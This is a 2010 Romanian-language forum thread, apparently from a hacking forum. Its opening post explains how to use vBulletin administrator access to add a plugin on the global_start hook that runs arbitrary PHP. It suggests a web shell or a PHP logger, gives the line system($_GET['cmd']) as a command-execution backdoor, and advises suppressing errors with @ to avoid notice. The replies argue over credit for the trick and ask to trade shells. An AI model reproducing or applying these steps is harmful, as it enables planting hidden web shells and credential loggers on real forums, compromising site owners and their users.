Vlachs Posted February 24, 2010 Report Posted February 24, 2010 Dinainte de a incepe trebuie sa stiti ca aveti nevoie de un cont de administrator pentru a face asta!Pasul1. Activati "Plugin/Hook System" de aici -> admincp/options.php?do=options&dogroup=pluginPasul2. Creati un nou plugin accesand urmatoarea adresa -> admincp/plugin.php?do=addPasul3. Completati identic =>- La Hook Location selectati din lista global_start- Title puneti ce vreti voi- Execution Order lasati valoarea pusa deja- Plugin PHP Code -> aici e treaba, nu trebuie neaparat sa includeti numai un shell, puteti sa faceti ce vreti voi cu el, sa puneti un php logger, sa faceti chiar ce vrea sufletelul vostru, completati field-ul respectiv cu ce aveti voi nevoie:ex: file_put_contents("fisier.txt","aaa");ex1: system($_GET['cmd']); ... si exemplele pot continua, va trebuie doar imaginatiePasul4. Bifati sa fie activa si salvatips: pentru a nu afisa erori e bine ca sa folositi @ la orice functie care poate intoarce o eroareps1:merge pe toate versiunile de vbulletinSper sa va fie de folos, aa si apropo da-ti la rep putin 3 7 Quote
Vlachs Posted February 24, 2010 Author Report Posted February 24, 2010 a mai fost postat de tinkode si il gasiti si pe googleincepi sa ma calci pe nervi, serios acum Quote
Vlachs Posted February 24, 2010 Author Report Posted February 24, 2010 ca fac pe hackerul asa cum mi-ai zis in pm ? cu ce-am facut pe hackerul ? ca am punctat ca nu-i ideea ta ? ce e rau in asta ?nu am gasit pe net, am incercat eu, prima data am incercat sa introduc in tema, nu am stiut ca e facut deja Quote
luvvyo Posted March 10, 2010 Report Posted March 10, 2010 ai si u vreun shell ati dau licenta vbulletin Quote